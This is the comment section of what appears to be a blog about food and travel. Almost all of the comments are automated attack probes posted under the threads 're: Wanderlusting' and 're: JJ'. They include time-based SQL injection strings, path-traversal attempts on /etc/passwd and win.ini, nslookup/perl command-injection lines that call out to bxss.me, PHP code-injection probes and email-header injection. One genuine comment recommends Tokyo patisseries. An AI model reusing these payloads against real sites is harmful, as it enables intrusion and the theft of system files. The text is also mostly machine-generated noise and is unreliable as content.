.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\
re: Wanderlusting
WEB-INF/web.xml
re: Wanderlusting
WEB-INF\web.xml
re: Wanderlusting
1
re: Wanderlusting
1
re: Wanderlusting
-1 OR 2+579-579-1=0+0+0+1 --
re: Wanderlusting
-1 OR 3+579-579-1=0+0+0+1 --
re: Wanderlusting
-1 OR 2+142-142-1=0+0+0+1
re: Wanderlusting
-1 OR 3+142-142-1=0+0+0+1
re: Wanderlusting
-1' OR 2+89-89-1=0+0+0+1 --
re: Wanderlusting
-1' OR 3+89-89-1=0+0+0+1 --
re: Wanderlusting
-1' OR 2+825-825-1=0+0+0+1 or 'sbR1epoT'='
re: Wanderlusting
-1' OR 3+825-825-1=0+0+0+1 or 'sbR1epoT'='
re: Wanderlusting
-1" OR 2+723-723-1=0+0+0+1 --
re: Wanderlusting
-1" OR 3+723-723-1=0+0+0+1 --
re: Wanderlusting
if(now()=sysdate(),sleep(15),0)
re: Wanderlusting
0'XOR(if(now()=sysdate(),sleep(15),0))XOR'Z
re: Wanderlusting
0"XOR(if(now()=sysdate(),sleep(15),0))XOR"Z
re: Wanderlusting
(select(0)from(select(sleep(15)))v)/*'+(select(0)from(select(sleep(15)))v)+'"+(select(0)from(select(sleep(15)))v)+"*/
re: Wanderlusting
-1; waitfor delay '0:0:15' --
re: Wanderlusting
-1); waitfor delay '0:0:15' --
re: Wanderlusting
1 waitfor delay '0:0:15' --
re: Wanderlusting
jbK4uKSS'; waitfor delay '0:0:15' --
re: Wanderlusting
-5 OR 453=(SELECT 453 FROM PG_SLEEP(15))--
re: Wanderlusting
-5) OR 508=(SELECT 508 FROM PG_SLEEP(15))--
re: Wanderlusting
-1)) OR 795=(SELECT 795 FROM PG_SLEEP(15))--
re: Wanderlusting
OPwp0wVB' OR 71=(SELECT 71 FROM PG_SLEEP(15))--
re: Wanderlusting
Bv8zBBsX') OR 430=(SELECT 430 FROM PG_SLEEP(15))--
re: Wanderlusting
mlNnLGpy')) OR 823=(SELECT 823 FROM PG_SLEEP(15))--
re: Wanderlusting
1*DBMS_PIPE.RECEIVE_MESSAGE(CHR(99)||CHR(99)||CHR(99),15)
re: Wanderlusting
1'||DBMS_PIPE.RECEIVE_MESSAGE(CHR(98)||CHR(98)||CHR(98),15)||'
re: Wanderlusting
'||(select 1 from (select pg_sleep(15))x)||'
re: Wanderlusting
''||(select 1 from (select pg_sleep(15))x)||''
re: Wanderlusting
1'"
re: Wanderlusting
@@M4ypz
I can second RIVA (the patisserie affiliated with LESS). Yuji Ajiki also makes a fantastic roll cake and fromage cru petit gateaux, but is located in the middle of nowhere :p.
Found A Tes Souhaits overrated, despite its high Tabelog score. Same goes for Asako Iwayanagi (the parfaits are nice but not ¥6000 nice).
re: JJ
gaBiS1iO
re: JJ
1*
re: JJ
1*
re: JJ
1*
re: JJ
1*
re: JJ
-1 OR 2+415-415-1=0+0+0+1
re: JJ
-1 OR 3+415-415-1=0+0+0+1
re: JJ
if(now()=sysdate(),sleep(15),0)
re: JJ
0'XOR(if(now()=sysdate(),sleep(15),0))XOR'Z
re: JJ
0"XOR(if(now()=sysdate(),sleep(15),0))XOR"Z
re: JJ
(select(0)from(select(sleep(15)))v)/*'+(select(0)from(select(sleep(15)))v)+'"+(select(0)from(select(sleep(15)))v)+"*/
re: JJ
-1; waitfor delay '0:0:15' --
re: JJ
-1); waitfor delay '0:0:15' --
re: JJ
1 waitfor delay '0:0:15' --
re: JJ
VgTu1UFM'; waitfor delay '0:0:15' --
re: JJ
-5 OR 360=(SELECT 360 FROM PG_SLEEP(15))--
re: JJ
-5) OR 219=(SELECT 219 FROM PG_SLEEP(15))--
re: JJ
-1)) OR 669=(SELECT 669 FROM PG_SLEEP(15))--
re: JJ
ZUVYzPVo' OR 971=(SELECT 971 FROM PG_SLEEP(15))--
re: JJ
akDsYJyk') OR 113=(SELECT 113 FROM PG_SLEEP(15))--
re: JJ
6OcVWlQ3')) OR 190=(SELECT 190 FROM PG_SLEEP(15))--
re: JJ
*DBMS_PIPE.RECEIVE_MESSAGE(CHR(99)||CHR(99)||CHR(99),15)
re: JJ
'||DBMS_PIPE.RECEIVE_MESSAGE(CHR(98)||CHR(98)||CHR(98),15)||'
re: JJ
'||(select 1 from (select pg_sleep(15))x)||'
re: JJ
''||(select 1 from (select pg_sleep(15))x)||''
re: JJ
1'"
re: JJ
@@xYbZW
re: JJ
1C6ezZC38zO
re: JJ
response.write(9610901*9775212)
re: JJ
'+response.write(9610901*9775212)+'
re: JJ
"+response.write(9610901*9775212)+"
re: JJ
%0abcc:074625.67-19518.67.c3377.19990.2@bxss.me
re: JJ
to@example.com>%0d%0abcc:074625.67-19519.67.c3377.19990.2@bxss.me
re: JJ
<esi:include src="http://bxss.me/rpb.png"/>
re: JJ
../../../../../../../../../../../../../../etc/passwd
re: JJ
../../../../../../../../../../../../../../windows/win.ini
re: JJ
file:///etc/passwd
re: JJ
../../../../../../../../../../../../../../../proc/version
re: JJ
${10000357+9999251}
re: JJ
..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd
re: JJ
../../../../../../../../../../etc/passwd%00.jpg
re: JJ
..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.jpg
re: JJ
/../..//../..//../..//../..//../..//etc/passwd%00.jpg
re: JJ
.\\./.\\./.\\./.\\./.\\./.\\./etc/passwd
re: JJ
echo blpluq$()\ unefft\nz^xyu||a #' &echo blpluq$()\ unefft\nz^xyu||a #|" &echo blpluq$()\ unefft\nz^xyu||a #
re: JJ
/etc/passwd
re: JJ
&echo miothx$()\ cywttv\nz^xyu||a #' &echo miothx$()\ cywttv\nz^xyu||a #|" &echo miothx$()\ cywttv\nz^xyu||a #
re: JJ
%2fetc%2fpasswd
re: JJ
)
re: JJ
|echo wovfmg$()\ uydiil\nz^xyu||a #' |echo wovfmg$()\ uydiil\nz^xyu||a #|" |echo wovfmg$()\ uydiil\nz^xyu||a #
re: JJ
/.././.././.././.././.././.././.././../etc/./passwd%00
re: JJ
!(()&&!|*|*|
re: JJ
(nslookup hiteukhppqayf46d87.bxss.me||perl -e "gethostbyname('hiteukhppqayf46d87.bxss.me')")
re: JJ
../..//../..//../..//../..//../..//../..//../..//../..//etc/passwd
re: JJ
^(#$!@#$)(()))******
re: JJ
$(nslookup hitybvhqkdptoa08a5.bxss.me||perl -e "gethostbyname('hitybvhqkdptoa08a5.bxss.me')")
re: JJ
../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././etc/passwd
re: JJ
&nslookup hitsjjrvhuovkd88d1.bxss.me&'\"`0&nslookup hitsjjrvhuovkd88d1.bxss.me&`'
re: JJ
../././../././../././../././../././../././../././../././../././../././etc/passwd
re: JJ
&(nslookup hitwvhrbwfkwgd2906.bxss.me||perl -e "gethostbyname('hitwvhrbwfkwgd2906.bxss.me')")&'\"`0&(nslookup hitwvhrbwfkwgd2906.bxss.me||perl -e "gethostbyname('hitwvhrbwfkwgd2906.bxss.me')")&`'
re: JJ
..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%afetc/passwd
re: JJ
|(nslookup hitmelhvvkgftccf30.bxss.me||perl -e "gethostbyname('hitmelhvvkgftccf30.bxss.me')")
re: JJ
invalid../../../../../../../../../../etc/passwd/././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././.
re: JJ
`(nslookup hitjmqbsczrbpfe836.bxss.me||perl -e "gethostbyname('hitjmqbsczrbpfe836.bxss.me')")`
re: JJ
file:///etc/passwd
re: JJ
'.gethostbyname(lc('hitbv'.'pgrmfmtm178ac.bxss.me.')).'A'.chr(67).chr(hex('58')).chr(98).chr(84).chr(120).chr(80).'
re: JJ
;(nslookup hitukfqikcjuk87940.bxss.me||perl -e "gethostbyname('hitukfqikcjuk87940.bxss.me')")|(nslookup hitukfqikcjuk87940.bxss.me||perl -e "gethostbyname('hitukfqikcjuk87940.bxss.me')")&(nslookup hitukfqikcjuk87940.bxss.me||perl -e "gethostbyname('hitukfqikcjuk87940.bxss.me')")
re: JJ
http://dicrpdbjmemujemfyopp.zzz/yrphmgdpgulaszriylqiipemefmacafkxycjaxjs%3F.jpg
re: JJ
/\../\../\../\../\../\../\../etc/passwd
re: JJ
".gethostbyname(lc("hitgk"."carwukznb9e3c.bxss.me."))."A".chr(67).chr(hex("58")).chr(109).chr(76).chr(98).chr(65)."
re: JJ
1yrphmgdpgulaszriylqiipemefmacafkxycjaxjs%00.jpg
re: JJ
/WEB-INF/web.xml
re: JJ
Http://bxss.me/t/fit.txt
re: JJ
C:\WINDOWS\system32\drivers\etc\hosts
re: JJ
http://bxss.me/t/fit.txt%3F.jpg
re: JJ
../../../../../../../../../../windows/win.ini%00.jpg
re: JJ
/etc/shells
re: JJ
/../../../../../../../../../../boot.ini
re: JJ
c:/windows/win.ini
re: JJ
HttP://bxss.me/t/xss.html?%00
re: JJ
%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%afwindows%c0%afwin.ini
re: JJ
"+"A".concat(70-3).concat(22*4).concat(118).concat(74).concat(120).concat(89)+(require"socket"
Socket.gethostbyname("hitwn"+"flwxevunc132d.bxss.me.")[3].to_s)+"
re: JJ
bxss.me
re: JJ
bxss.me/t/xss.html?%00
re: JJ
..\..\..\..\..\..\..\..\windows\win.ini
re: JJ
'+'A'.concat(70-3).concat(22*4).concat(116).concat(82).concat(108).concat(89)+(require'socket'
Socket.gethostbyname('hitxf'+'yevgrihle479b.bxss.me.')[3].to_s)+'
re: JJ
)))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))
re: JJ
..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5cwindows%5cwin.ini
re: JJ
;assert(base64_decode('cHJpbnQobWQ1KDMxMzM3KSk7'));
re: JJ
/.\\./.\\./.\\./.\\./.\\./.\\./windows/win.ini
re: JJ
';print(md5(31337));$a='
re: JJ
../..//../..//../..//../..//../..//../..//../..//../..//windows/win.ini
re: JJ
";print(md5(31337));$a="
re: JJ
../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././windows/win.ini
re: JJ
${@print(md5(31337))}
re: JJ
'"
re: JJ
unexisting/../../../../../../../../../../windows/win.ini.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\
re: JJ
${@print(md5(31337))}\
re: JJ
<!--
re: JJ
WEB-INF/web.xml
re: JJ
'.print(md5(31337)).'
re: JJ
WEB-INF\web.xml
re: JJ
1
re: JJ
1
re: JJ
-1 OR 2+880-880-1=0+0+0+1 --
re: JJ
-1 OR 3+880-880-1=0+0+0+1 --
re: JJ
-1 OR 2+68-68-1=0+0+0+1
re: JJ
-1 OR 3+68-68-1=0+0+0+1
re: JJ
-1' OR 2+147-147-1=0+0+0+1 --
re: JJ
-1' OR 3+147-147-1=0+0+0+1 --
re: JJ
-1' OR 2+120-120-1=0+0+0+1 or 'GmL98q1T'='
re: JJ
-1' OR 3+120-120-1=0+0+0+1 or 'GmL98q1T'='
re: JJ
-1" OR 2+681-681-1=0+0+0+1 --
re: JJ
-1" OR 3+681-681-1=0+0+0+1 --
re: JJ
if(now()=sysdate(),sleep(15),0)
re: JJ
0'XOR(if(now()=sysdate(),sleep(15),0))XOR'Z
re: JJ
0"XOR(if(now()=sysdate(),sleep(15),0))XOR"Z
re: JJ
(select(0)from(select(sleep(15)))v)/*'+(select(0)from(select(sleep(15)))v)+'"+(select(0)from(select(sleep(15)))v)+"*/
re: JJ
-1; waitfor delay '0:0:15' --
re: JJ
-1); waitfor delay '0:0:15' --
re: JJ
1 waitfor delay '0:0:15' --
re: JJ
zZwf0JGJ'; waitfor delay '0:0:15' --
re: JJ
-5 OR 809=(SELECT 809 FROM PG_SLEEP(15))--
re: JJ
-5) OR 270=(SELECT 270 FROM PG_SLEEP(15))--
re: JJ
-1)) OR 581=(SELECT 581 FROM PG_SLEEP(15))--
re: JJ
zPOkRvjm' OR 146=(SELECT 146 FROM PG_SLEEP(15))--
re: JJ
TItIieuD') OR 951=(SELECT 951 FROM PG_SLEEP(15))--
re: JJ
B73Mklnh')) OR 94=(SELECT 94 FROM PG_SLEEP(15))--
re: JJ
1*DBMS_PIPE.RECEIVE_MESSAGE(CHR(99)||CHR(99)||CHR(99),15)
re: JJ
1'||DBMS_PIPE.RECEIVE_MESSAGE(CHR(98)||CHR(98)||CHR(98),15)||'
re: JJ
'||(select 1 from (select pg_sleep(15))x)||'
re: JJ
''||(select 1 from (select pg_sleep(15))x)||''
re: JJ
1'"
re: JJ
@@0mnKk